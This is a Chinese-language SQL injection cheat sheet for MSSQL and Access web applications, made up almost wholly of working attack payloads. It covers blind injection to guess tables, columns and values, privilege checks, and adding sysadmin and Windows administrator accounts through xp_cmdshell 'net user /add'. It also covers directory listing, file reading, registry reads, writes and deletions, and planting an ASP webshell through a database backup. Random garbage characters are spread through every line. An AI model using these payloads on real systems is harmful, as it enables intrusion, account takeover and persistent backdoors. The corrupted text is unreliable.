1.判断是否有注入;and 1=1 ;and 1=2 cRC�ji^,KJ
2.初步判断是否是mssql ;and user>0 gx�e�u2�HG
nE0�I�[�T(
3.注入参数是字符'and [查询条件] and ''=' �:uqEGnEut
%U�.x��9UL
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 6�/p9a�g�]
M?<iQxtyb}
5.判断数据库系统 .�:B0�(4Mj
a3z_o)" ��
;and (select count(*) from sysobjects)>0 mssql >M��hZ(&iD
q�1 BpE8��
;and (select count(*) from msysobjects)>0 access Qw_>
l}k/�
���/}�%C'�
�o�/�vD]Fs
zW��hzU|=8
6.猜数据库 ;and (select Count(*) from [数据库名])>0 a�W;)-0+�
t-i�Q�aobF
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 }dqOE-"I"n
�.�vIRz-�S
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 }�N,v&���B
=i2]��qj\
9.(1)猜字段的ascii值(access) *+2BZ�ZwT�
Z^J)]U�L�/
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 d7x6r3��J$
�-- Ie��wW
(2)猜字段的ascii值(mssql) l�Qt,(@7]
!:uh? �RW
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 2�$2@?]|?�
31�%3&B:Ts
10.测试权限结构(mssql) ��B[f�:T%�
9\E];~"iP�
j�d�"YaZOQ
���:;�La�V
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- !�>+�m46A�
v0;���dk�(
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ]C|�xo.=?]
.Rb1%1bdc
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- N>g6KgX{K�
�=BV_�?���
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �s%m?�Yh3�
��M?n}{0E4
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- m�M+�^v[=�
.�\)e��k[?
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- S�3QX{5�t\
B��HN��J�H
;and 1=(select IS_MEMBER('db_owner'));-- O-~cj7
0\
MRK3Cey}�%
�OK�j\>��3
62[_u]<Yub
11.添加mssql和系统的帐户 6pZ/C�<Y|W
6$csFW3�R�
;exec master.dbo.sp_addlogin username;-- O\@�0�o|NM
;exec master.dbo.sp_password null,username,password;-- b=L|G�V@$�
9):^[Wkx��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- }��Py Z{yS
Z�%SDN"+'g
;exec master.dbo.xp_cmdshell 'net user username password �?�fpI,WFu
%T;�V�S-f
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �|+�<o(Q(
[W� d�xMU
;exec master.dbo.xp_cmdshell 'net user username password /add';-- k4^!"~<+0�
S6_dm�TV*
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 0n�R�_��I^
�w'm�n O'%
�78]( ZYJV
UVs�F�� !0
12.(1)遍历目录 fn�F�I�w=d
Oe��k$f,J-
;create table dirs(paths varchar(100), id int) `YBHBTG'o!
-9s&OKo`({
;insert dirs exec master.dbo.xp_dirtree 'c:\' H]M[2�C7#N
�@ "�C�P@^
;and (select top 1 paths from dirs)>0
H^$��7��=
5<oV>|*@�{
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �Ik�=bgE�F
�_w%{yF6 �
A{DE7gp!��
Z�[�\n�yj
(2)遍历目录 �TF,(�[p�*
C3K�"�)BO!
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- HLq2a�vs\�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �WOYN%�
0#
P�4s,N|bs`
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 %�6:"�tu�A
H1vTo�IP%
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 t�h�{Ib@o�
�r#6dj��s1
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 4X>=UO``�L
I5rAL\�y-G
!Bhs8e�Gr3
TO�]
cZ�Z<
13.mssql中的存储过程 ���;\P��q�
Z.� �xOO�|
xp_regenumvalues 注册表根键, 子键 �^F|/\�i��
d�ifAQ<�`�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 {��9nH�#yv
Q�nIF{T�S=
xp_regread 根键,子键,键值名 4Jw�_gOY&D
):5H,B+Vr&
;exec xp_regread zf[KZ\6H��
]%h�|�o�x0
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 LJ*W&y(2>Q
4Z��T0~37(
xp_regwrite 根键,子键, 值名, 值类型, 值 *p^*>~i�9)
K|rG&�#1�J
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �7��x(z���
�0?�'v|�5}
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 /�f��!�ze|
L:��UPS&�)
xp_regdeletevalue 根键,子键,值名
?!n0N\|i]
NH8\&#}nAK
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��<e�-hR$�
��2nB{oF-Z
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 H�+VjY MvK
z?C&�,m�v�
vu�_ u�\2d
}�h9f(ZyJn
14.mssql的backup创建webshell �wf,��w%n�
()(/�9t��
use model VCv�F�CyAz
��~�J�|B�
create table cmd(str image); �jd}-&D�N�
�X�chV�sA�
insert into cmd(str) values (''); wv�&%0�9�U
Z�$Vd�8U;
backup database model to disk='c:\l.asp'; [d�6�T�wKv
s-T#-raE�
�W�7�q�!�F
""_%u'7t5I
15.mssql内置函数 �RjGJfN��{
&���M�P �+
;and (select @@version)>0 获得Windows的版本号 �T�^
�RY�N
7[YulC-pH�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa n�ztnU9OG�
p-2PC{% t|
;and (select user_name())>0 爆当前系统的连接用户 ]4�)�$dQ59
h@D!/���PS
;and (select db_name())>0 得到当前连接的数据库 PKX
Tj6hj)
mP�-Y9*k�
/jd.<�r=_I
��4cJk��a~
16.简洁的webshell 'a=Q��CO
0
(L�!#2��Jy
use model � *#sY-G�d
)'ax�J����
create table cmd(str image); !mu1e=bY�>
U#k�d��cc|
insert into cmd(str) values (''); ^eCM�AT�E�
?0'��d��b
backup database model to disk='g:\wwwtest\l.asp';
